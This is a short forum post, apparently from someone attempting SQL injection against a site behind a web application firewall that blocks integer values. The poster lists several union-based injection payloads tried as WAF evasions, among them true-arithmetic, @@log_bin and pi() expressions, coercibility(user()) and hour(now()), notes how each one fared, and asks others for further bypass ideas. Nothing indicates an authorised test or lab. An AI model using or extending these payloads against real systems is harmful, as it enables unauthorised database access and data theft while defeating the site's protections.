Hi,
Basically the WAF I run into is blocking any integer representation.
That means that I can't do a basic union-based injection using
Code:
union select 1,2-- -
because the WAF automatically detects the integers.
I tried using some hacks like
Code:
union select true,true+true-- - # Doesn't work (standard error)
union select @@log_bin,ceil(pi()*pi()*floor(pi()))-- - # Redirect page (WAF triggered)
union select @@new, coercibility(user())-- - # Redirect page (WAF)
hour(now()) # same
!pi() # same
...
And so on.
So it looks like the WAF checks the GET parameter after the statement was processed.
If you guys have any idea, I'm willing to test.
Thanks,